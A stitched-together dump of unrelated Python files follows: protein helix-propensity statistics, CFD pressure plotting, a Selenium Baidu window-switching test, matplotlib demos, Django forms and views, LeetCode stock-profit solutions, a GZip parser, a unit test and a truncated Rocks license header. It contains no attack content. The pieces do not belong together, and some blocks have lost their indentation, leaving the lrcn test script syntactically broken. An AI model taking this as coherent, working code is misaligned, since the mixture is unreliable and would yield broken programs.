        if (c in helixPropensityHorovitz) and (c != 'P'):  #exclude proline
            # Note: I left in the kB*T factor even though it cancels out later
            num_common_AA_Horovitz += 1
            cov11_Horovitz += (kB*T*(ener[c]-ave_ener))**2
            cov22_Horovitz += (helixPropensityHorovitz[c]-avePropHorovitz)**2
            cov12_Horovitz += kB*T*(ener[c]-ave_ener)*(helixPropensityHorovitz[c]-avePropHorovitz)
        if (c in helixPropensityONeil) and (c != 'P'):  #exclude proline:
            # Note: I left in the kB*T factor even though it cancels out later
            num_common_AA_ONeil += 1
            cov11_ONeil += (kB*T*(ener[c]-ave_ener))**2
            cov22_ONeil += (helixPropensityONeil[c]-avePropONeil)**2
            cov12_ONeil += kB*T*(ener[c]-ave_ener)*(helixPropensityONeil[c]-avePropONeil)
        if (c in helixPropensityBlaber44) and (c != 'P'):  #exclude proline:
            # Note: I left in the kB*T factor even though it cancels out later
            num_common_AA_Blaber44 += 1
            cov11_Blaber44 += (kB*T*(ener[c]-ave_ener))**2
            cov22_Blaber44 += (helixPropensityBlaber44[c]-avePropBlaber44)**2
            cov12_Blaber44 += kB*T*(ener[c]-ave_ener)*(helixPropensityBlaber44[c]-avePropBlaber44)
        if (c in helixPropensityMyersPeptidePh7) and (c != 'P'):  #exclude proline:
            num_common_AA_MyersPeptide += 1
            cov11_MyersPeptide += (kB*T*(ener[c]-ave_ener))**2
            cov22_MyersPeptide += (helixPropensityMyersPeptidePh7[c]-avePropMyersPeptide)**2
            cov12_MyersPeptide += kB*T*(ener[c]-ave_ener)*(helixPropensityMyersPeptidePh7[c]-avePropMyersPeptide)
        if (c in helixPropensityMyersProteinPh7) and (c != 'P'):  #exclude proline:
            num_common_AA_MyersProtein += 1
            cov11_MyersProtein += (kB*T*(ener[c]-ave_ener))**2
            cov22_MyersProtein += (helixPropensityMyersProteinPh7[c]-avePropMyersProtein)**2
            cov12_MyersProtein += kB*T*(ener[c]-ave_ener)*(helixPropensityMyersProteinPh7[c]-avePropMyersProtein)

    sys.stdout.write('\n-------------------------------------\n')
    sys.stdout.write(' sigma = '+str(math.sqrt(cov11_Horovitz/num_common_AA_Horovitz))+'\n')
    sys.stdout.write(' sigmaHorovitz = '+str(math.sqrt(cov22_Horovitz/num_common_AA_Horovitz))+'\n')
    sys.stdout.write(' R = '+str(math.sqrt((cov12_Horovitz*cov12_Horovitz)/(cov11_Horovitz*cov22_Horovitz)))+'\n')
    sys.stdout.write('-------------------------------------\n')
    sys.stdout.write(' sigma = '+str(math.sqrt(cov11_ONeil/num_common_AA_ONeil))+'\n')
    sys.stdout.write(' sigmaONeil = '+str(math.sqrt(cov22_ONeil/num_common_AA_ONeil))+'\n')
    sys.stdout.write(' R = '+str(math.sqrt((cov12_ONeil*cov12_ONeil)/(cov11_ONeil*cov22_ONeil)))+'\n')
    sys.stdout.write('-------------------------------------\n')
    sys.stdout.write(' sigma = '+str(math.sqrt(cov11_Blaber44/num_common_AA_Blaber44))+'\n')
    sys.stdout.write(' sigmaBlaber44 = '+str(math.sqrt(cov22_Blaber44/num_common_AA_Blaber44))+'\n')
    sys.stdout.write(' R = '+str(math.sqrt((cov12_Blaber44*cov12_Blaber44)/(cov11_Blaber44*cov22_Blaber44)))+'\n')
    sys.stdout.write('-------------------------------------\n')
    sys.stdout.write(' sigma = '+str(math.sqrt(cov11_MyersProtein/num_common_AA_MyersProtein))+'\n')
    sys.stdout.write(' sigmaMyersProtein = '+str(math.sqrt(cov22_MyersProtein/num_common_AA_MyersProtein))+'\n')
    sys.stdout.write(' R = '+str(math.sqrt((cov12_MyersProtein*cov12_MyersProtein)/(cov11_MyersProtein*cov22_MyersProtein)))+'\n')
    sys.stdout.write('-------------------------------------\n')
    sys.stdout.write(' sigma = '+str(math.sqrt(cov11_MyersPeptide/num_common_AA_MyersPeptide))+'\n')
    sys.stdout.write(' sigmaMyersPeptide = '+str(math.sqrt(cov22_MyersPeptide/num_common_AA_MyersPeptide))+'\n')
    sys.stdout.write(' R = '+str(math.sqrt((cov12_MyersPeptide*cov12_MyersPeptide)/(cov11_MyersPeptide*cov22_MyersPeptide)))+'\n')
    sys.stdout.write('-------------------------------------\n')

    # If an argument to this program was given, then we assume it is
    # the name of a file containing a candidate sequence.
    # Assuming that the energy of every amino acid is additive,
    # we can estimate the energy of the candidate sequence.
    # Ignoring correlations, this is proportional to the the negative logarithm
    # of the probability of a sequence of that length evolving at random.
    if len(sys.argv) > 1:
        seqfilename = sys.argv[1]
        seqfile = open(seqfilename, 'r')  # renamed from `file` (shadowed builtin)
        for line in seqfile:
            line = line.strip()
            sys.stdout.write('Using energies inferred from the database:\n')
            U, deltaU = CalcSequenceEnergyErr(line, ener, delta_ener)
            sys.stdout.write(str(U*kB*T)+' '+str(deltaU*kB*T)+'\n')
            sys.stdout.write('Using Horovitz1992:\n')
            U = CalcSequenceEnergy(line, helixPropensityHorovitz)
            sys.stdout.write(str(U)+'\n')
            sys.stdout.write('Using ONeil1990:\n')
            U = CalcSequenceEnergy(line, helixPropensityONeil)
            sys.stdout.write(str(U)+'\n')
            sys.stdout.write('Using Blaber44_1993:\n')
            U = CalcSequenceEnergy(line, helixPropensityBlaber44)
            sys.stdout.write(str(U)+'\n')
            sys.stdout.write('Using Myers1997_peptide_pH7:\n')
            U = CalcSequenceEnergy(line, helixPropensityMyersPeptidePh7)
            sys.stdout.write(str(U)+'\n')
            sys.stdout.write('Using Myers1997_protein_pH7:\n')
            U = CalcSequenceEnergy(line, helixPropensityMyersProteinPh7)
            sys.stdout.write(str(U)+'\n')
# Standard script entry point: run main() only when executed directly.
if __name__ == "__main__":
    main()
|
import re, numpy, os,operator,time,math
import matplotlib.pyplot as plt
from multiprocessing import Pool
from mpl_toolkits.mplot3d import Axes3D
def takeSecond(elem):
    """Sort key: order elements by descending X, breaking ties by descending Y."""
    x_key = -elem.X
    y_key = -elem.Y
    return (x_key, y_key)
class Pop(object):
    """A single sample point read from export.csv: position (X, Y, Z),
    pressure, and the velocity components (u, v, w)."""

    def __init__(self, X=None, Y=None, Z=None, Pressure=None, v=None, u=None, w=None):
        # BUG FIX: the original signature used mutable default arguments
        # (X=[], Y=[], ...).  Those lists are created once at definition time
        # and shared by every instance that relies on a default, so mutating
        # one instance's attribute silently changed the others.  None
        # sentinels give each instance a fresh, independent list.
        self.X = [] if X is None else X
        self.Y = [] if Y is None else Y
        self.Z = [] if Z is None else Z
        self.Pressure = [] if Pressure is None else Pressure
        self.v = [] if v is None else v
        self.u = [] if u is None else u
        self.w = [] if w is None else w
# --- Load and parse the exported field data (Python 2 script) -------------
t2=time.time()
#file = open('../postProcessing/forces%i/0/forces.dat'%I, 'r')
# NOTE(review): shadows the Python 2 builtin `file`; the handle is never closed.
file = open('export.csv', 'r')
file = file.read()
# Pull every numeric token (including scientific notation) out of the text.
s=map(float, re.findall(r'[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?', file))
X=numpy.array(s)
a=[]
z=0
# Skip the first 13 numbers (presumably a header row -- TODO confirm).
for i in s:
    if z>=13:
        a.append(i)
    z+=1
i=0
P=[]
# Each record appears to be 16 numbers wide: x, y, z, pressure, three unused
# values, then u, v, w (see the index offsets below).
P.append(Pop(a[i],a[i+1],a[i+2],a[i+3],a[i+7],a[i+8],a[i+9]))
#print [a[i],a[i+1],a[i+2],a[i+3],a[i+7],a[i+8],a[i+9]]
# NOTE(review): the first record is appended twice -- once above and once in
# the first iteration of the loop below.
while i<=((len(a)-13)):
    #print i
    #print a[i]
    P.append(Pop(a[i],a[i+1],a[i+2],a[i+3],a[i+7],a[i+8],a[i+9]))
    #X.append(a[i]);i+=1
    #Y.append(a[i]);i+=1
    #Z.append(a[i]);i+=1
    #Pressure.append(a[i]);i+=4
    #u.append(a[i]);i+=1
    #v.append(a[i]);i+=1
    #w.append(a[i]);i+=1
    i+=16
p1=P  # alias, not a copy: sorting P below also reorders p1
#P.sort(key=lambda x:takeSecond)#takeSecond)
P.sort(key=takeSecond)  # descending X, then descending Y
print 'Sorted'
for i in xrange(0,10):
    print i,[P[i].X,P[i].Y,P[i].Z,P[i].Pressure,P[i].v,P[i].u,P[i].w]
p2=[]
# Keep only the points with Y >= 1.440.
for i in range(len(P)):
    if P[i].Y>=1.440:
        p2.append(P[i])
for i in xrange(0,10):
    print i,[p2[i].X,p2[i].Y,p2[i].Z,p2[i].Pressure,p2[i].v,p2[i].u,p2[i].w]
mesh=[]
z=1
# Count how many consecutive points share each X value -> per-row lengths.
for i in range(len(p2)-1):
    if p2[i+1].X==p2[i].X:
        z+=1
    else:
        mesh.append(z)
        z=1
# Ragged 2-D grids shaped by the per-row lengths in `mesh`.
z=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
#print z,len(z),len(z[0])
X=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
Y=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
#Z=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
Pressure=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
v=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
u=[[0 for i in range(mesh[j])]for j in range(len(mesh))]
#w=z
t=0
# Scatter the filtered points into the row/column grids in sorted order.
for i in range(len(z)):
    for j in range(len(z[i])):
        X[i][j]=p2[t].X
        Y[i][j]=p2[t].Y
        #Z[i][j]=p2[t].Z
        Pressure[i][j]=p2[t].Pressure
        v[i][j]=-p2[t].v  # note the sign flip on v
        u[i][j]=p2[t].u
        #w[i][j]=p2[t].w
        t+=1
#X1=numpy.asarray(X)
#Y1=numpy.asarray(Y)
#Pressure1=numpy.asarray(Pressure)
'''
for i in xrange(0,200):
    print i,[p2[i].X,p2[i].Y,p2[i].Z,p2[i].Pressure,p2[i].v,p2[i].u,p2[i].w]
'''
print len(X),len(X[0]),len(Y),len(Y[0]),len(Pressure),len(Pressure[0])
'''
for i in xrange(0,150):
    plt.plot(Y[i],v[i])
    print i,X[i][0]
#plt.show()
'''
#'''
# Global color-scale bounds over the whole pressure field.
# NOTE(review): `len(Pressure[i])` reuses the leaked comprehension variable --
# this only works because the grid rows happen to be compatible; verify.
min1=min([min([Pressure[i][j] for i in range(len(Pressure))]) for j in range(len(Pressure[i]))])
max1=max([max([Pressure[i][j] for i in range(len(Pressure))]) for j in range(len(Pressure[i]))])
def run(t):
    # Render one synthetic vertical "slice" for grid row t and save it as
    # PICS/Fig<t>.png.  Reads the module-level Y, Pressure, min1 and max1
    # (shared read-only with the worker processes via fork).
    Y1=[[0 for i in range(len(Y[t]))]for j in range(len(Y[t]))]
    Z1=[[0 for i in range(len(Y[t]))]for j in range(len(Y[t]))]
    Pressure1=[[0 for i in range(len(Y[t]))]for j in range(len(Y[t]))]
    for i in range(len(Y1)):
        for j in range(len(Y1[i])):
            Y1[i][j]=Y[t][j]
            # NOTE(review): Python 2 integer division on the next two lines;
            # under Python 3 the results would change (use // to keep them).
            Z1[i][j]=i/10#((len(Y1[i])-j)**2/(len(Y1[i])))*14.0
            Pressure1[i][j]=((len(Y1[i])-i)/(len(Y1[i])))*Pressure[t][j]#
    #print Pressure1
    print len(Y1),len(Y1[0]),min1,max1
    # Fixed vmin/vmax keep the color scale identical across all frames.
    plt.contourf(Y1,Z1,Pressure1,255,vmin=int(min1),vmax=int(max1))
    plt.axis('equal')
    plt.savefig('PICS/Fig%i.png'%(t))
    plt.close()
# Render one frame per grid row in parallel; each worker writes one PNG.
ax=[t for t in range(len(X))]
#ax=[100,150]
y = Pool()
result = y.map(run,ax)
y.close()
y.join()
#min1=min([min([Pressure[i][j] for i in range(len(Pressure))]) for j in range(len(Pressure[i]))])
#max1=max([max([Pressure[i][j] for i in range(len(Pressure))]) for j in range(len(Pressure[i]))])
#print min1,max1
# Full-field pressure contour over the whole (X, Y) grid.
plt.contourf(X,Y,Pressure,255,vmin=int(min1),vmax=int(max1))
plt.axis('equal')
plt.savefig('Pressure.jpg')
plt.show()
plt.close()
'''
#'''
#plt.show()
'''
fig=plt.figure()
ax=fig.add_subplot(111,projection='3d')
plt.scatter(X,Y,Pressure,alpha=0.8,c='b',edgecolor='none')
plt.show()
x,y=numpy.meshgrid(X,Y)
z=numpy.meshgrid(Pressure)
print x,y,z
delta=0.1
x=numpy.arange(-3.0,3.0,delta)
y=numpy.arange(-2.0,2.0,delta)
X,Y=numpy.meshgrid(x,y)
Z1=numpy.exp(-X**2-Y**2)
Z2=numpy.exp(-(X-1)**2-(Y-1)**2)
Z=(Z1-Z2)*2
print X,Y,Z
plt.contour(X,Y,Z)
plt.show()
'''
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
from selenium_auto.test_windows_and_frame_locate.Base import Base
class TestWindows(Base):
    """Window-handle switching demo against the Baidu login/registration pages."""

    def test_window(self):
        """Open the registration page in a new window, type into it, then
        switch back to the original window and click the login button."""
        self.driver.get("http://www.baidu.com")
        self.driver.find_element_by_link_text("登录").click()
        print(self.driver.current_window_handle)  # current window before the jump
        print(self.driver.window_handles)  # all open window handles
        self.driver.find_element_by_link_text("立即注册").click()
        print(self.driver.current_window_handle)  # still the original window after the jump
        print(self.driver.window_handles)  # all open window handles
        windows = self.driver.window_handles
        # FIX: driver.switch_to_window() was deprecated and removed in
        # Selenium 4; driver.switch_to.window() is the supported API and
        # behaves identically.
        self.driver.switch_to.window(windows[-1])
        print(self.driver.current_window_handle)  # now the newly opened window
        self.driver.find_element_by_id("TANGRAM__PSP_4__userName").send_keys("username")
        self.driver.find_element_by_id("TANGRAM__PSP_4__phone").send_keys("13570808795")
        time.sleep(2)
        self.driver.switch_to.window(windows[0])
        time.sleep(2)
        self.driver.find_element_by_id("TANGRAM__PSP_10__footerULoginBtn").click()
|
import numpy as np
import math
import matplotlib as mpl
import matplotlib.pyplot as plt
"""
mpl.rcParams['font.sans-serif'] = [u'SimHei']
mpl.rcParams['axes.unicode_minus'] = False
mu = 0
sigma = 1
x = np.linspace(mu - 3*sigma, mu + 3*sigma, 51)
y = np.exp(-(x - mu) ** 2 / (2 * sigma **2)) / (math.sqrt(2 * math.pi) * sigma)
plt.figure(facecolor='w')
plt.plot(x, y, 'r-', x, y, 'go', linewidth = 2, markersize = 8)
plt.xlabel('X', fontsize = 15)
plt.ylabel('Y', fontsize = 15)
plt.title('Gauss Distribution', fontsize = 18)
plt.grid(True)
plt.show()
#损失函数
x = np.linspace(start = -2,stop = 3, num = 1001, dtype = np.float)
y_logit = np.log(1 + np.exp(-x)) / math.log(2)
y_boost = np.exp(-x)
y_01 = x < 0
y_hinge = 1.0 - x
y_hinge[y_hinge < 0] = 0
plt.figure(figsize = (10, 8))
plt.plot(x, y_logit, 'r-', label = 'Logistic Loss', linewidth = 2)
plt.plot(x, y_01, 'g-',label = '0/1 Loss', linewidth = 2)
plt.plot(x, y_hinge, 'b-', label = 'Hinge Loss', linewidth = 2)
plt.plot(x, y_boost, 'm--', label = 'Adaboost Loss', linewidth = 2)
plt.grid()
plt.legend(loc = 'upper right')
plt.show()
def f(x):
y = np.ones_like(x) #形状一样,用1填充
i = x > 0
y[i] = np.power(x[i], x[i])
i = x < 0
y[i] = np.power(-x[i], -x[i])
return y
#x^x函数
x = np.linspace(-1.3, 1.3, 101)
y = f(x)
plt.plot(x, y, 'g-', label = 'x^x', linewidth = 2)
plt.grid()
plt.legend(loc = 'upper left')
plt.show()
"""
#sinx 函数
x = np.linspace(0, 10, 100)
y = np.sin(x)
plt.plot(x, y, 'g-', label = 'sinx', linewidth = 2)
plt.grid()
plt.legend(loc = 'upper right')
plt.show() |
from django import forms
from django.contrib.auth.forms import AuthenticationForm
from .models import Profile, Neighborhood, Business ,Post
class ProfileForm(forms.ModelForm):
    '''
    Form for an authenticated user to update their profile.
    Only the profile photo and display name are editable here.
    '''
    class Meta:
        model = Profile
        fields = ['profile_photo','name']
class NeighborhoodForm(forms.ModelForm):
    '''
    Form for an authenticated user to create a neighborhood
    (name, location and population).
    '''
    class Meta:
        model = Neighborhood
        fields = ['neighborhood_name','neighborhood_location', 'population']
class PostBusinessForm(forms.ModelForm):
    '''
    Form for an authenticated user to post a business
    (cover image, business name and contact email).
    '''
    class Meta:
        model = Business
        fields = ['cover_image','business_name', 'email']
class PostMessageForm(forms.ModelForm):
    '''
    Form for an authenticated user to post a message
    (optional image with a caption, plus the message body).
    '''
    class Meta:
        model = Post
        fields = ['image','image_name', 'message']
from typing import List  # FIX: `List` was referenced below without being imported


class Solution:
    """Best Time to Buy and Sell Stock III: at most two transactions, two-pass DP."""

    def maxProfit(self, prices: List[int]) -> int:
        """Return the maximum profit from at most two non-overlapping
        buy/sell transactions.

        Forward pass: profits[i] is the best single-transaction profit in
        prices[0..i].  Backward pass: for each i, combine the best second
        transaction bought at i with the best first transaction that ends
        before i.  O(n) time, O(n) space.
        """
        profits, lowest, highest, maxProfit = [], float('inf'), -float('inf'), 0
        for p in prices:
            if p < lowest:
                lowest = p
            maxProfit = max(maxProfit, p - lowest)
            profits.append(maxProfit)
        maxProfit = 0
        for i in range(len(profits) - 1, -1, -1):
            if prices[i] > highest:
                highest = prices[i]
            # Second transaction buys at i; the first must finish by i-1.
            maxProfit = max(maxProfit, (highest - prices[i]) + (profits[i - 1] if i > 0 else 0))
        return maxProfit
from typing import List  # FIX: `List` was referenced below without being imported


class Solution:  # NOTE: redefines the class above -- alternative O(1)-space approach
    """Best Time to Buy and Sell Stock III via a four-state machine."""

    def maxProfit(self, prices: List[int]) -> int:
        """Return the maximum profit from at most two transactions.

        buyK/sellK hold the best cash balance right after the K-th buy/sell.
        FIX: the original used the arbitrary sentinel -999999 for the "not
        bought yet" states, which gives wrong answers when every price
        exceeds 999999; float('-inf') is correct for any magnitude.
        """
        sell1, sell2, buy1, buy2 = 0, 0, float('-inf'), float('-inf')
        for price in prices:
            buy1 = max(buy1, -price)
            sell1 = max(sell1, buy1 + price)
            buy2 = max(buy2, sell1 - price)
            sell2 = max(sell2, buy2 + price)
        return sell2
import math
def main():
    # Read n (number of queries) and the box width/height. (Python 2 script:
    # raw_input/input and print statements.)
    n, w, h = [int(s) for s in raw_input().split()]
    # A rod of length l fits in the w x h box iff l <= the box diagonal.
    d = math.sqrt(w**2 + h**2)
    for _ in range(n):
        l = input()
        # 'NE' (no) if it does not fit, 'DA' (yes) otherwise.
        print 'NE' if l > d else 'DA'

if '__main__' == __name__:
    main()
|
import test_path_setting
import torch
from models import lrcn
def lrcn_test(num_classes, parameter):
    """Instantiate the lrcn model (sequence length 60), optionally list its
    parameter counts, then run a dummy forward pass and print the shapes."""
    net = lrcn(num_classes, 60)
    print(net)
    if parameter:
        # Per-parameter counts, then the grand total.
        for name, weight in net.named_parameters():
            print(name, end="")
            print(":", weight.numel())
        print("total_params:", sum(w.numel() for w in net.parameters()))
    # inputs = torch.randn(5, 60, 3, 128, 128)
    dummy = torch.randn(5, 10)
    print(dummy.size())
    result = net(dummy)
    print(result.size())
if __name__ == "__main__":
try:
num_classes = int(input("num_classes: "))
except ValueError:
num_classes = 140
try:
parameter = bool(input("parameter: "))
except ValueError:
parameter = False
try:
expansion = bool(input("expansion: "))
except ValueError:
expansion = False
lrcn_test(num_classes, parameter)
|
# -*- coding: utf-8 -*-
"""GZip files."""
# Note: do not rename file to gzip.py this can cause the exception:
# AttributeError: 'module' object has no attribute 'GzipFile'
# when using pip.
import os
import zlib
from dtformats import data_format
from dtformats import errors
class GZipFile(data_format.BinaryDataFile):
  """GZip (.gz) file."""

  # Using a class constant significantly speeds up the time required to load
  # the dtFabric and dtFormats definition files.
  _FABRIC = data_format.BinaryDataFile.ReadDefinitionFile('gzipfile.yaml')

  _DEBUG_INFORMATION = data_format.BinaryDataFile.ReadDebugInformationFile(
      'gzipfile.debug.yaml', custom_format_callbacks={
          'posix_time': '_FormatIntegerAsPosixTime'})

  # Member header constants per RFC 1952.
  _GZIP_SIGNATURE = 0x8b1f

  _COMPRESSION_METHOD_DEFLATE = 8

  # Bits of the member header FLG field (RFC 1952).
  _FLAG_FTEXT = 0x01
  _FLAG_FHCRC = 0x02
  _FLAG_FEXTRA = 0x04
  _FLAG_FNAME = 0x08
  _FLAG_FCOMMENT = 0x10

  # Compressed data is consumed in chunks of this size (16 MiB).
  _BUFFER_SIZE = 16 * 1024 * 1024

  def _ReadCompressedData(self, zlib_decompressor, compressed_data):
    """Reads compressed data.
    Args:
      zlib_decompressor (zlib.Decompress): zlib decompressor.
      compressed_data (bytes): compressed data.
    Returns:
      tuple[bytes, bytes]: decompressed data and remaining data.
    """
    data_segments = []
    while compressed_data:
      data = zlib_decompressor.decompress(compressed_data)
      if not data:
        break
      data_segments.append(data)
      # Bytes past the end of the deflate stream belong to the member footer
      # or the next member; hand them back to the caller.
      compressed_data = getattr(zlib_decompressor, 'unused_data', b'')
    return b''.join(data_segments), compressed_data

  def _ReadMemberCompressedData(self, file_object):
    """Reads a member compressed data.
    Args:
      file_object (file): file-like object.
    """
    # Negative wbits: raw deflate stream without zlib header/trailer.
    zlib_decompressor = zlib.decompressobj(-zlib.MAX_WBITS)
    compressed_data = file_object.read(self._BUFFER_SIZE)
    while compressed_data:
      data, compressed_data = self._ReadCompressedData(
          zlib_decompressor, compressed_data)
      if compressed_data:
        # Rewind so the unconsumed bytes are re-read as the member footer or
        # the next member header.
        file_object.seek(-len(compressed_data), os.SEEK_CUR)
      if not data:
        break
      compressed_data = file_object.read(self._BUFFER_SIZE)

  def _ReadMemberFooter(self, file_object):
    """Reads a member footer.
    Args:
      file_object (file): file-like object.
    Raises:
      ParseError: if the member footer cannot be read.
    """
    file_offset = file_object.tell()
    data_type_map = self._GetDataTypeMap('gzip_member_footer')
    member_footer, _ = self._ReadStructureFromFileObject(
        file_object, file_offset, data_type_map, 'member footer')
    if self._debug:
      debug_info = self._DEBUG_INFORMATION.get('gzip_member_footer', None)
      self._DebugPrintStructureObject(member_footer, debug_info)

  def _ReadMemberHeader(self, file_object):
    """Reads a member header.
    Args:
      file_object (file): file-like object.
    Raises:
      ParseError: if the member header cannot be read.
    """
    file_offset = file_object.tell()
    data_type_map = self._GetDataTypeMap('gzip_member_header')
    member_header, _ = self._ReadStructureFromFileObject(
        file_object, file_offset, data_type_map, 'member header')
    if self._debug:
      debug_info = self._DEBUG_INFORMATION.get('gzip_member_header', None)
      self._DebugPrintStructureObject(member_header, debug_info)
    if member_header.signature != self._GZIP_SIGNATURE:
      raise errors.ParseError(
          f'Unsupported signature: 0x{member_header.signature:04x}.')
    if member_header.compression_method != self._COMPRESSION_METHOD_DEFLATE:
      raise errors.ParseError((
          f'Unsupported compression method: '
          f'{member_header.compression_method:d}.'))
    # Optional header fields are present in FLG-bit order: extra field,
    # original filename, comment, header CRC16 (RFC 1952).
    if member_header.flags & self._FLAG_FEXTRA:
      file_offset = file_object.tell()
      data_type_map = self._GetDataTypeMap('uint16le')
      extra_field_data_size, _ = self._ReadStructureFromFileObject(
          file_object, file_offset, data_type_map, 'extra field data size')
      # The extra field payload is skipped, not parsed.
      file_object.seek(extra_field_data_size, os.SEEK_CUR)
    if member_header.flags & self._FLAG_FNAME:
      file_offset = file_object.tell()
      data_type_map = self._GetDataTypeMap('cstring')
      value_string, _ = self._ReadStructureFromFileObject(
          file_object, file_offset, data_type_map, 'original filename')
      if self._debug:
        self._DebugPrintValue('Original filename', value_string)
    if member_header.flags & self._FLAG_FCOMMENT:
      file_offset = file_object.tell()
      data_type_map = self._GetDataTypeMap('cstring')
      value_string, _ = self._ReadStructureFromFileObject(
          file_object, file_offset, data_type_map, 'comment')
      if self._debug:
        self._DebugPrintValue('Comment', value_string)
    if member_header.flags & self._FLAG_FHCRC:
      # Header CRC16: read to advance the offset; the value is not verified.
      file_object.read(2)

  def ReadFileObject(self, file_object):
    """Reads a GZip file-like object.
    Args:
      file_object (file): file-like object.
    Raises:
      ParseError: if the file cannot be read.
    """
    # A .gz file is a sequence of members; parse header, deflate stream and
    # footer for each until the end of the file is reached.
    file_offset = 0
    while file_offset < self._file_size:
      self._ReadMemberHeader(file_object)
      self._ReadMemberCompressedData(file_object)
      self._ReadMemberFooter(file_object)
      file_offset = file_object.tell()
|
from django.urls import path, include
from . import views
# URL routes for this app: landing page, notifications, login,
# post detail (by integer primary key) and post creation.
urlpatterns = [
    path('', views.home),
    path('notify/', views.notify),
    path('login/', views.login),
    path('<int:id>/', views.post),
    path('create/', views.create)
]
from django.conf.urls import patterns, include, url
from rest_framework import routers
from .views import (
EquipoViewSet, ComentarioViewSet
)
# DRF router exposing the equipos and comentarios viewsets.
router = routers.DefaultRouter()
router.register(r'equipos', EquipoViewSet)
router.register(r'comentarios', ComentarioViewSet)
# NOTE(review): django.conf.urls.patterns() was deprecated in Django 1.8 and
# removed in 1.10; this module only works on older Django versions.
urlpatterns = patterns('uthhconf.api.views',
    url(r'^', include(router.urls)),
)
|
from django.http import HttpResponse
from django.shortcuts import render # this is used for getting attached html file
import operator
def Homepage(request):
    # Render the attached template; template-context variables could also be
    # passed here as the third argument to render().
    return render(request,'home.html')
def aboutpage(request):
    # Render the static "about" template.
    return render(request,'about.html')
def birds(request):
    # Plain-text response; no template involved.
    return HttpResponse('This is the bird page')
# def animals(request):
#     return HttpResponse('This is the Specfic animal page')
# FIX: only the `def` line had been commented out, leaving a bare `return`
# at module level -- a SyntaxError that broke the entire module.  The whole
# disabled view is now commented out.
def countfunction(request):
    """Count word frequencies in the text submitted through the search box
    and render them, most frequent first."""
    fulltext = request.GET['fulltext']  # text typed into the form's text box
    wordlist = fulltext.split()
    worddictionary = {}
    for word in wordlist:
        # dict.get collapses the original add-or-increment branches.
        worddictionary[word] = worddictionary.get(word, 0) + 1
    # Sort (word, count) pairs by count, descending.
    sortedwords = sorted(worddictionary.items(), key=operator.itemgetter(1), reverse=True)
    return render(request,'count.html',{'fulltext':fulltext,'count':len(wordlist),'sortedwords':sortedwords})
|
"""
Unit test to make sure the test_grades function calculates score changes properly.
Author: kk3175
Date: 12/8/2015
Class: DSGA1007, Assignment 10
"""
import pandas as pd
from RestaurantInspectionData import RestaurantInspectionData
from unittest import TestCase
from datetime import datetime
class GradeScoresTest(TestCase):
    def test__test_grades_function(self):
        """Verify test_grades() scores an unchanged, improved and declined
        grade pair as 0, 1 and -1 respectively."""
        restaurantData = RestaurantInspectionData()
        dates_testList = [
            datetime.strptime('2012-02-22 00:00:00', '%Y-%m-%d %H:%M:%S'),
            datetime.strptime('2015-06-22 00:00:00', '%Y-%m-%d %H:%M:%S'),
        ]
        # (grade pair, expected score change)
        cases = [
            (['C', 'C'], 0),   # grade does not change
            (['C', 'A'], 1),   # grade improves
            (['A', 'C'], -1),  # grade declines
        ]
        for grade_testList, expectedOutput in cases:
            output = restaurantData.test_grades(grade_testList, dates_testList)
            self.assertEqual(output, expectedOutput)
|
# $Id: __init__.py,v 1.14 2012/11/27 00:49:40 phil Exp $
#
# @Copyright@
#
# Rocks(r)
# www.rocksclusters.org
# version 5.6 (Emerald Boa)
# version 6.1 (Emerald Boa)
#
# Copyright (c) 2000 - 2013 The Regents of the University of California.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice unmodified and in its entirety, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. All advertising and press materials, printed or electronic, mentioning
# features or use of this software must display the following acknowledgement:
#
# "This product includes software developed by the Rocks(r)
# Cluster Group at the San Diego Supercomputer Center at the
# University of California, San Diego and its contributors."
#
# 4. Except as permitted for the purposes of acknowledgment in paragraph 3,
# neither the name or logo of this software nor the names of its
# authors may be used to endorse or promote products derived from this
# software without specific prior written permission. The name of the
# software includes the following terms, and any derivatives thereof:
# "Rocks", "Rocks Clusters", and "Avalanche Installer". For licensing of
# the associated name, interested parties should contact Technology
# Transfer & Intellectual Property Services, University of California,
# San Diego, 9500 Gilman Drive, Mail Code 0910, La Jolla, CA 92093-0910,
# Ph: (858) 534-5815, FAX: (858) 534-7345, E-MAIL:invent@ucsd.edu
#
# THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN
# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# @Copyright@
#
# $Log: __init__.py,v $
# Revision 1.14 2012/11/27 00:49:40 phil
# Copyright Storm for Emerald Boa
#
# Revision 1.13 2012/05/06 05:49:50 phil
# Copyright Storm for Mamba
#
# Revision 1.12 2011/07/23 02:31:44 phil
# Viper Copyright
#
# Revision 1.11 2010/09/07 23:53:33 bruno
# star power for gb
#
# Revision 1.10 2009/05/01 19:07:34 mjk
# chimi con queso
#
# Revision 1.9 2008/10/18 00:56:23 mjk
# copyright 5.1
#
# Revision 1.8 2008/09/02 18:19:29 phil
